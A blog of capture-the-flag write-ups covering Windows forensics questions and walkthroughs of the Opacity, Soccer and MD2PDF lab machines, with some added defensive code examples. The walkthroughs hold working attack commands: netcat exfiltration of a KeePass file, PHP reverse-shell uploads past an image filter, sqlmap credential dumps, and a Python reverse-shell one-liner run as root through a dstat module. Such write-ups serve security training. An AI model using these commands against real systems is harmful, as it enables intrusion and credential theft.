Wednesday, May 17, 2023

THM - Windows Forensics 1

Scenario

One of the Desktops in the research lab at Organization X is  suspected to have been accessed by someone unauthorized. Although they  generally have only one user account per Desktop, there were multiple  user accounts observed on this system. It is also suspected that the  system was connected to some network drive, and a USB device was  connected to the system. The triage data from the system was collected  and placed on the attached VM. Can you help Organization X with finding answers to the below questions?

Questions

How many user-created accounts are present on the system?
Load the SAM hive found in
triage\C\Windows\System32\Config; within it we can find the users. The question only wants user-created accounts, so disregarding the built-in accounts we have 3.

What is the username of the account that has never been logged in?
We can answer this within the same hive; there is only one user without a Last Login Time.


What's the password hint for the user THM-4n6?

Can also be answered from within here :)


When was the file 'Changelog.txt' accessed?
Load the NTUSER hive, drill down to RecentDocs and check the .txt files.


What is the complete path from where the Python 3.8.2 installer was run?
Within the NTUSER hive, drill down to the UserAssist registry keys and look for the GUID subkey with the most values. Within it you can find all the applications which have been executed.
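As an added example (not part of this writeup or the THM room data), here is how the values under a UserAssist GUID subkey are decoded: the value names are ROT13-obfuscated and the binary data carries the run count and the last-execution FILETIME. The 72-byte Windows 7+ layout and the sample path are assumptions/constructed for this example; reading a real NTUSER.DAT would need a hive library such as python-registry.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

# Windows FILETIME counts 100-nanosecond ticks since 1601-01-01 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ticks):
    """Convert a FILETIME integer to an aware UTC datetime (None if zero)."""
    if ticks == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime; used here only to build the sample."""
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def decode_userassist_name(value_name):
    """Value names under UserAssist\\{GUID}\\Count are ROT13-obfuscated."""
    return codecs.decode(value_name, "rot_13")


def parse_userassist_value(value_name, value_data):
    """Parse one REG_BINARY value from a UserAssist Count subkey.

    Assumption: the 72-byte Windows 7+ layout, with the run count at
    offset 4, focus count at 8, focus time (ms) at 12 and the
    last-run FILETIME at offset 60.
    """
    if len(value_data) < 68:
        raise ValueError("value too short for the Windows 7+ UserAssist layout")
    run_count, focus_count, focus_ms = struct.unpack_from("<III", value_data, 4)
    (last_run_ticks,) = struct.unpack_from("<Q", value_data, 60)
    return {
        "path": decode_userassist_name(value_name),
        "run_count": run_count,
        "focus_count": focus_count,
        "focus_time_ms": focus_ms,
        "last_run": filetime_to_datetime(last_run_ticks),
    }


def build_sample_value(path, run_count, last_run):
    """Construct a (value_name, value_data) pair as the registry would store it.

    This is constructed test data, not an artefact from the THM room.
    """
    data = bytearray(72)
    struct.pack_into("<III", data, 4, run_count, 1, 4500)
    struct.pack_into("<Q", data, 60, datetime_to_filetime(last_run))
    return codecs.encode(path, "rot_13"), bytes(data)


def sample_record():
    """Round-trip a constructed entry through the parser."""
    name, data = build_sample_value(
        "C:\\Temp\\example-installer.exe",
        3,
        datetime(2021, 3, 15, 10, 30, tzinfo=timezone.utc),
    )
    return parse_userassist_value(name, data)


if __name__ == "__main__":
    rec = sample_record()
    print(f"{rec['path']}  runs={rec['run_count']}  last={rec['last_run'].isoformat()}")
```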


When was the USB device with the friendly name 'USB' last connected?
To find the USB device with the friendly name 'USB', let's look in
SOFTWARE\Microsoft\Windows Portable Devices\Devices



Further USB information can be found with the SYSTEM hive under:
SYSTEM\CurrentControlSet\Enum\USBSTOR
SYSTEM\CurrentControlSet\Enum\USB


Look at the device whose GUID matches the friendly-named USB device.


Tuesday, April 25, 2023

THM - Opacity

Enumeration

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-25 11:11 BST
Nmap scan report for 10.10.87.188
Host is up (0.022s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| 256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
|_ 256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-25T10:11:28
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.62 seconds

Port 80 open with Apache 2.4.41 running
SMB running

Login box at port 80

More enumeration!

└─$ smbclient -L \\\\10.10.87.188
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (opacity server (Samba, Ubuntu))

Not much available without authentication for SMB.

└─$ smbmap -H 10.10.87.188
[+] IP: 10.10.87.188:445 Name: 10.10.87.188
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (opacity server (Samba, Ubuntu))
START_TIME: Tue Apr 25 11:30:03 2023

URL_BASE: http://10.10.87.188/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.87.188/ ----
==> DIRECTORY: http://10.10.87.188/cloud/

The cloud directory looks interesting!

We can try to upload things!

Exploitation

Whilst dirb was running in the background it also found http://10.10.87.188/cloud/images/ ; presumably this is where the uploaded images are stored.

I hosted a server and tried to upload a shell using https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php . It didn't like this as it had to be an image.

I tried with just a space and then .jpg, which didn't work; using a null character, #.jpg, worked and we had a shell... for a time. The 5-minute file cleanup meant you only have 5 minutes until the files are deleted.
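The bypasses above work because the check looks at the end of whatever string the client sent. As an added illustration (not the Opacity application's code), here is that weak check next to a hardened one that judges the extension on the URL path alone, rejects NUL and other control characters, and verifies the file's magic bytes; the sample inputs are constructed inline.

```python
import posixpath
import secrets
from urllib.parse import urlsplit

# Allowed extension -> magic bytes the file content must start with.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}


def weak_check(supplied_name):
    """What a 'must be an image' filter often reduces to: inspect the tail of
    whatever string the client supplied (file name or URL)."""
    return supplied_name.lower().endswith((".jpg", ".jpeg", ".png"))


def hardened_check(supplied_name, content):
    """Accept only if the path part has an allowed extension, the base name
    carries no control characters, and the bytes match that type."""
    # 1. A URL fragment (#...) or query (?...) is not part of the file name,
    #    so "shell.php#.jpg" is judged on "shell.php".
    path = urlsplit(supplied_name).path
    base = posixpath.basename(path)
    # 2. Reject empty/traversal names and control characters; a NUL would
    #    truncate the name inside C-based libraries and filesystems.
    if base in ("", ".", "..") or any(ord(c) < 0x20 or ord(c) == 0x7F for c in base):
        return False
    ext = posixpath.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False
    # 3. Trust the bytes, not the name. (A magic check alone does not stop a
    #    JPEG/PHP polyglot; the upload directory must also never execute code.)
    return any(content.startswith(magic) for magic in ALLOWED_TYPES[ext])


def stored_name(supplied_name, content):
    """Never reuse the client's name on disk: keep only the validated
    extension and generate the rest. Returns None when rejected."""
    if not hardened_check(supplied_name, content):
        return None
    ext = posixpath.splitext(posixpath.basename(urlsplit(supplied_name).path))[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    php = b"<?php echo 'x'; ?>"  # constructed non-image content
    jpeg = b"\xff\xd8\xff\xe0" + bytes(8)  # constructed JPEG header
    for name, body in (("shell.php#.jpg", php), ("photo.jpg", jpeg)):
        print(name, "weak:", weak_check(name), "hardened:", hardened_check(name, body))
```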

$ ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swap.img
sys
tmp
usr
var
$ whoami
www-data
$ cd home
$ ls
sysadmin
$ cd sysadmin
$ ls
local.txt
scripts
$ cat local.txt
cat: local.txt: Permission denied

We have a second user, sysadmin, we want this one!

www-data doesn't have much access: there is a scripts folder but we don't have permissions for that. We do have access to /opt, though, and there is an interesting file in there called dataset.kdbx. A .kdbx file is a KeePass database; we want this!

After some hunting I found we can transfer files using netcat (nc). To do this, on the destination host (our attack box) we listen for the file:

Example: nc -l -p 7555 > myfile.txt
Used:
nc -lnvp 4446 > dataset.kdbx

On the source host (victim) we send the file:
Example:
nc 10.1.1.2 7555 < myfile.txt
Used:
nc 10.9.3.226 4446 < dataset.kdbx

We now have the file! Let's crack it.

Following the guide from https://www.thedutchhacker.com/how-to-crack-a-keepass-database-file/ we can pull out the hash using keepass2john and then crack the password.

keepass2john dataset.kdbx > hash.txt

Take the cracked password, open the database, get the new creds.

Remember, SSH is open, let's go get our first flag!

PrivEsc

Now we're on the machine without a time limit we can take a breath and think of the next step. Under the sysadmin home there is a script.php, which is the script used to delete the files found within the images folder. This runs every 5 minutes and could be useful. There are a bunch of PHP files under the lib directory.

sysadmin@opacity:~/scripts$ ls -lha
total 16K
drwxr-xr-x 3 root root 4.0K Jul 8 2022 .
drwxr-xr-x 6 sysadmin sysadmin 4.0K Feb 22 08:16 ..
drwxr-xr-x 2 sysadmin root 4.0K Jul 26 2022 lib
-rw-r----- 1 root sysadmin 519 Jul 8 2022 script.php

Hello... the script is owned by root... but we can't edit it :(

After a little, okay a lot, of thinking: we know root is running the script, and we know there is a job that runs script.php from the scripts folder. What if we just make a new script which is a reverse shell? Let's give it a go. Using the same script as before, we can load that into a new scripts folder (moving/renaming the old one), call it script.php, set up the listener and wait....

Boom, it worked! From here we can get the final flag!

Really fun machine, this one. Luckily my brain has a small capacity and I totally forgot about SMB, which wasn't required. The folder being cleared out stumped me for a while until the penny dropped, and getting root being as simple as it was tripped me up!

Monday, April 24, 2023

THM - Investigating Windows

Introduction

This is a challenge that is exactly what it says on the tin: there are a few challenges around investigating a Windows machine that has been previously compromised.

Questions

What's the version and year of the Windows machine?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Which user logged in last?
Get-LocalUser | Select Name, Lastlogon

When did John log onto the system last?
We can get that info from our last command

What IP does the system connect to when it first starts?
There will be a cmd pop-up upon system login showing the IP.

What two accounts had administrative privileges (other than the Administrator user)?
net localgroup administrators

What's the name of the scheduled task that is malicious?
Check the scheduled tasks; there will be a few obvious ones which stick out! Check the actions of each.

What file was the task trying to run daily?
Found under the actions of the malicious task.

What port did this file listen locally for?
Found under the actions of the malicious task.

When did Jenny last logon?
We can use
Get-LocalUser | Select Name, Lastlogon
Or
Check the Security log in Event Viewer and filter for Jenny and EID 4624

At what date did the compromise take place?
Something was created for persistence, when?

At what time did Windows first assign special privileges to a new logon?
Search EID 4672 under the security log.
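The two Event Viewer checks above (latest 4624 for a user, earliest 4672 for a non-system account) as an added Python example, not part of the writeup: it parses Security log records in the event-XML layout that wevtutil exports and joins each 4672 back to its 4624 through the logon id. The XML records, names, times and logon ids are constructed for this example.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

EVENT = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVENT}

# Constructed sample of a Security log export (event XML as wevtutil emits it,
# wrapped in one root element). Names, times and logon ids are made up.
SAMPLE_XML = f"""<Events>
<Event xmlns="{EVENT}"><System><EventID>4672</EventID>
 <TimeCreated SystemTime="2023-01-10T07:00:00.1234567Z"/></System>
 <EventData><Data Name="SubjectUserName">SYSTEM</Data><Data Name="SubjectLogonId">0x3e7</Data></EventData></Event>
<Event xmlns="{EVENT}"><System><EventID>4624</EventID>
 <TimeCreated SystemTime="2023-01-10T08:15:00.0000000Z"/></System>
 <EventData><Data Name="TargetUserName">John</Data><Data Name="LogonType">2</Data>
 <Data Name="TargetLogonId">0x4a1b2</Data></EventData></Event>
<Event xmlns="{EVENT}"><System><EventID>4624</EventID>
 <TimeCreated SystemTime="2023-01-11T09:00:00.0000000Z"/></System>
 <EventData><Data Name="TargetUserName">Jenny</Data><Data Name="LogonType">10</Data>
 <Data Name="TargetLogonId">0x5b2c1</Data></EventData></Event>
<Event xmlns="{EVENT}"><System><EventID>4672</EventID>
 <TimeCreated SystemTime="2023-01-11T09:00:01.5000000Z"/></System>
 <EventData><Data Name="SubjectUserName">Jenny</Data><Data Name="SubjectLogonId">0x5b2c1</Data></EventData></Event>
<Event xmlns="{EVENT}"><System><EventID>4624</EventID>
 <TimeCreated SystemTime="2023-01-12T18:45:00.0000000Z"/></System>
 <EventData><Data Name="TargetUserName">Jenny</Data><Data Name="LogonType">3</Data>
 <Data Name="TargetLogonId">0x6c3d4</Data></EventData></Event>
</Events>"""


def parse_systemtime(value):
    """SystemTime carries 7 fractional digits and a Z; trim so fromisoformat accepts it."""
    value = value.rstrip("Z")
    if "." in value:
        base, frac = value.split(".", 1)
        value = f"{base}.{frac[:6].ljust(6, '0')}"
    return datetime.fromisoformat(value).replace(tzinfo=timezone.utc)


def parse_events(xml_text):
    """Flatten each <Event> into its id, UTC time and EventData name->value map."""
    events = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        events.append({
            "id": int(ev.find("e:System/e:EventID", NS).text),
            "time": parse_systemtime(ev.find("e:System/e:TimeCreated", NS).get("SystemTime")),
            "data": data,
        })
    return sorted(events, key=lambda e: e["time"])


def last_logon(events, user):
    """Latest 4624 for the user (case-insensitive), or None if never seen."""
    hits = [e["time"] for e in events
            if e["id"] == 4624 and e["data"].get("TargetUserName", "").lower() == user.lower()]
    return max(hits) if hits else None


def first_special_logon(events):
    """Earliest 4672 for a non-machine account, joined to its 4624 via the logon id."""
    logons = {e["data"].get("TargetLogonId"): e for e in events if e["id"] == 4624}
    for e in events:  # already time-sorted
        if e["id"] != 4672:
            continue
        user = e["data"].get("SubjectUserName", "")
        if user.upper() == "SYSTEM" or user.endswith("$"):
            continue  # skip the system and computer accounts that fire 4672 constantly
        match = logons.get(e["data"].get("SubjectLogonId"))
        return {"time": e["time"], "user": user,
                "logon_type": match["data"].get("LogonType") if match else None}
    return None


if __name__ == "__main__":
    evs = parse_events(SAMPLE_XML)
    print("Jenny last logon:", last_logon(evs, "Jenny"))
    print("First special-privilege logon:", first_special_logon(evs))
```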

What tool was used to get Windows passwords?
We can find that within the TMP folder the attackers created.

What was the attacker's external control and command server's IP?
Check the hosts file for any potential changes made by the attacker

What was the extension name of the shell uploaded via the server's website?
Check wwwroot

What was the last port the attacker opened?
Check the firewall rules for inbound, there are a few suspicious ports being opened to allow inbound connectivity.

Check for DNS poisoning, what site was targeted?
We found this within the hosts file.

Wednesday, April 5, 2023

HTB - Illumination

Initial Investigation & Solution

We can actually find the problem upon unzipping the challenge.

We see immediately that there is a .git folder along with what looks to be the log file!

Using git to read the log.

A token was removed as a security precaution; dig a little deeper and view the change.

There is the token! It looks to be base64, so simply decode it and we have our flag!


Friday, March 17, 2023

HTB - Behind The Scenes

Initial Investigation

Upon running the application it asks us for ./challenge <password>

Let's run strings and see what we find:

The interesting part is that we can see it expects the password to be in the format HTB{something}

Reversing

We can throw the binary into Ghidra and see what else we find. Within main, the decompilation looks to stop.

There is a UD2 instruction and then disassembly stops.

After some research I found this on the Ghidra GitHub. User pjsoberoi's comment is the solution:
"IMHO that is the correct behavior. You can manually disassemble the bytes after but that shouldn't change the decompilation. You can edit your own x86 slaspec and replace ud2 instruction with a "nop" pcode instruction. This should basically make the decompiler ignore the ud2 instruction. That seems like what you want."

With this information I disassembled the rest.

We then run through and replace all the UD2 instructions with a NOP, and slowly the code is built out until we eventually get our password and flag!

Friday, March 3, 2023

HTB - Soccer

 

Enumeration

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-01 15:36 GMT
Nmap scan report for 10.10.11.194
Host is up (0.11s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
9091/tcp open  xmltec-xmlmail?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.65 seconds

We find port 22, 80 and 9091 open. Let's do some further enumeration on port 80.

80/tcp   open  http            nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)

We find the domain; let's add it to our hosts file and continue our investigation.

There isn't a lot on the domain, seems to just be a static site with some football information. Let's use gobuster to see if we can find something interesting. 

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://soccer.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/01 16:07:48 Starting gobuster in directory enumeration mode
===============================================================
/tiny                 (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]

We have a directory called "tiny". We find that this is a file manager with a login. A quick search reveals some default credentials:

https://tinyfilemanager.github.io/docs/
Default creds:
admin/admin@123
user/12345

Luckily, the admin creds work and we're in!

Initial Foothold

Not in my screenshot is the Tiny File Manager version, which is 2.4.3. Back to the research table, we find that 2.4.3 has a vulnerability!

"A Path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager Project's Tiny File Manager <= 2.4.6 allows remote attackers with valid user accounts to upload malicious PHP files to the webroot and achieve code execution on the target server."

https://github.com/febinrev/tinyfilemanager-2.4.3-exploit

Unfortunately the PoC doesn't work in this instance, but it does confirm that the exploit exists.

 ┌──(kali㉿kali)-[~]
└─$ ./exploit.sh http://soccer.htb/tiny/tinyfilemanager.php admin "admin@123"
/usr/bin/curl
[✔] Curl found!
/usr/bin/jq
[✔] jq found!

[+]  Login Success! Cookie: filemanager=n8tbi19hj6jbq1lr9c0cj8a33k

[*] Try to Leak Web root directory path

[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : /var/www/html/tiny/

[-] File Upload Unsuccessful! Exiting!

The problem was with the upload: we don't have the correct permissions to upload to the location the script attempts. We're going to go manual!

First let's find a location we can upload to and prove that it works. 

We can upload to the uploads folder (of course...) and the test worked, so now let's upload a shell. I recently pulled the BlackArch shell repo, so I used the PHP reverse shell within that, changing the IP and port to match. Set up the listener and then fire.

We have a shell as www-data! We can make this a little more pleasant using

python3 -c "import pty; pty.spawn('/bin/bash')" 

I must admit, I was stuck now as the account didn't have much access. Being still new to this I had to do a lot of research into nginx, and I found out there is a folder which contains a config file. Within this conf file is a mention of the sites-enabled location, so I pivoted to look in there. We find a new site called soc-player.soccer.htb; add it to our hosts file and let's go take a look.

There was a little more to this site, including a login page! If we go to the login page we find that we have no creds, but we can sign up. Create a new dummy account and log in. We now have a ticket and a page where we can enter a ticket number. Open the developer tools and investigate how the site works and what is happening.


When a ticket number is put into the box and we click check, communication happens over a WebSocket to soc-player.soccer.htb:9091. This was our mystery port from enumeration; the next step is to exploit this process.

Exploitation - User

Let's view the page source code

        var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
        window.onload = function () {
        
        var btn = document.getElementById('btn');
        var input = document.getElementById('id');
        
        ws.onopen = function (e) {
            console.log('connected to the server')
        }
        input.addEventListener('keypress', (e) => {
            keyOne(e)
        });
        
        function keyOne(e) {
            e.stopPropagation();
            if (e.keyCode === 13) {
                e.preventDefault();
                sendText();
            }
        }
        
        function sendText() {
            var msg = input.value;
            if (msg.length > 0) {
                ws.send(JSON.stringify({
                    "id": msg
                }))
            }
            else append("????????")
        }
        }
        
        ws.onmessage = function (e) {
        append(e.data)
        }
        
        function append(msg) {
        let p = document.querySelector("p");
        // let randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
        // p.style.color = randomColor;
        p.textContent = msg
        }

From this code we can see exactly how it works. But how to exploit it? After another big session of researching I found https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html which goes into detail on how to conduct SQL injection over a WebSocket. I grabbed the script, made the required edits and set up the proxy.

We can then send sqlmap through the proxy to do its work. Note that sqlmap through this proxy will take a very long time! I recommend making sure it is running and then leaving it for 10-15 minutes while you do something else.

First, to get some enumeration on the database:
sqlmap -u "http://127.0.0.1:8081/?id=1" --batch --dbs

Then the dump:
sqlmap -u "http://127.0.0.1:8081/?id=1" --dbms mysql --dbs --threads 10 -p id -D soccer_db -T accounts -C username,password --dump-all
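To show why the ticket check is injectable, and what "blind" means here, an added example that is not the site's code (we never saw the server side): a handler that pastes the JSON id straight into the query beside one that validates and binds it, run against a constructed SQLite schema standing in for soccer_db. The response strings, table layout and row values are assumptions.

```python
import json
import re
import sqlite3

EXISTS = "Ticket Exists"
MISSING = "Ticket Doesn't Exist"


def setup_db():
    """Constructed in-memory stand-in for the database behind the ticket check."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE tickets (id INTEGER PRIMARY KEY);
        INSERT INTO tickets VALUES (1), (2), (3);
        CREATE TABLE accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO accounts (username, password) VALUES ('player', 'example-only');
        """
    )
    return conn


def check_ticket_vulnerable(conn, message):
    """The pattern that makes the socket injectable: the 'id' field from the
    WebSocket JSON message is interpolated into the SQL text."""
    ticket_id = json.loads(message)["id"]
    row = conn.execute(f"SELECT id FROM tickets WHERE id = {ticket_id}").fetchone()
    # The reply leaks one bit (row found or not), which is all a boolean-based
    # blind technique needs to ask yes/no questions about other tables.
    return EXISTS if row else MISSING


def check_ticket_safe(conn, message):
    """Hardened handler: validate the shape of the id, then bind it as a
    parameter so the driver never treats it as SQL."""
    try:
        ticket_id = str(json.loads(message)["id"])
    except (ValueError, KeyError, TypeError):
        return MISSING
    if not re.fullmatch(r"\d{1,10}", ticket_id):
        return MISSING
    row = conn.execute("SELECT id FROM tickets WHERE id = ?", (int(ticket_id),)).fetchone()
    return EXISTS if row else MISSING


if __name__ == "__main__":
    db = setup_db()
    for msg in ('{"id": "1"}', '{"id": "999"}', '{"id": "999 OR 1=1"}'):
        print(msg, "->", check_ticket_vulnerable(db, msg), "|", check_ticket_safe(db, msg))
```

The two handlers answer identically for real ticket numbers; only the injected input separates them, which is exactly the difference the proxy script and sqlmap work from.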

We can now log in through SSH and get the user flag!

Exploitation - Root

We now have user! Let's check if we can run anything as root. Damn!
Back to searching for an answer, I came across a few different things; the first was the alternative to sudo, doas. I then found two enumeration scripts, LinEnum and LinPEAS.

I pulled down both scripts and uploaded them to Soccer. Of the two I found LinPEAS to be a lot better; the latest release can be found here: https://github.com/carlospolop/PEASS-ng/releases/tag/20230226, and here is LinEnum: https://github.com/rebootuser/LinEnum.

After running LinPEAS we find that doas is on the system and we can use it to run dstat as root.
Dstat is a Linux performance measuring tool, but you can write custom modules for it. More research... https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-dstat-privilege-escalation/ has a nice overview. Unfortunately the exploit within there didn't work, but we can try something else!

Using https://www.revshells.com/ to create a reverse shell in Python, we can use dstat to run it as a custom module.

Dstat will load modules from /usr/local/share/dstat/ ; create a new module called dstat_<whatever>.py with the payload:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

Run it with doas -u root /usr/bin/dstat --<module name>

Be sure to have your listener running and you will get a root shell! From here you can get the root flag!
This was a long one but really fun!

Tuesday, February 21, 2023

THM - MD2PDF

Enumeration

We start by running nmap on the target to see what is running.
nmap -sC -sV -T4 <target ip>

Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-20 16:27 GMT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
WARNING: Service 10.10.96.67:5000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
WARNING: Service 10.10.96.67:80 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 10.10.96.67
Host is up (0.033s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 753a85da4c79ab329dbb3486e2b0f9d6 (RSA)
|   256 60a68b3edac21e6987adb7a637db2793 (ECDSA)
|_  256 723233926e17948b751872c82e7123f5 (ED25519)
80/tcp   open  rtsp
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2660
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="./static/codemirror.min.css"/>
|     <link
|     rel="stylesheet"
|     href="./static/bootstrap.min.css"/>
|     <title>MD2PDF</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">MD2PDF</span></a>
|     </div>
|     </nav>
|     <!-- Page Content -->
|     <div class="container">
|     <div class="">
|     <div class="card mt-4">
|     <textarea class="form-control" name="md" id="md"></textarea>
|     </div>
|     <div class="mt-3
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|     Content-Length: 0
|   RTSPRequest:
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|_    Content-Length: 0
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
|_http-title: MD2PDF
5000/tcp open  rtsp
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2624
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="./assets/codemirror.min.css"/>
|     <link
|     rel="stylesheet"
|     href="./assets/bootstrap.min.css"/>
|     <title>MD2PDF</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">MD2PDF</span></a>
|     </div>
|     </nav>
|     <!-- Page Content -->
|     <div class="container">
|     <div class="">
|     <div class="card mt-4">
|     <textarea class="form-control" name="md" id="md"></textarea>
|     </div>
|     <div class="mt-3
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, OPTIONS, GET
|     Content-Length: 0
|   RTSPRequest:
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, OPTIONS, GET
|_    Content-Length: 0
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
<snip>------------<snip>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds

We have ports 22, 80 and 5000 open. We will go straight to port 80 and further our enumeration.

The server is hosting a Markdown-to-PDF converter. Let's convert something and see what is being used on the back end.

It is using wkhtmltopdf 0.12.5 to convert the Markdown. Researching exploits and vulnerabilities for this version brings us to file inclusion!

Let's find out what directories are on the server using gobuster.

└─$ gobuster dir --url http://10.10.96.67/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.96.67/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/02/20 17:10:11 Starting gobuster in directory enumeration mode
===============================================================
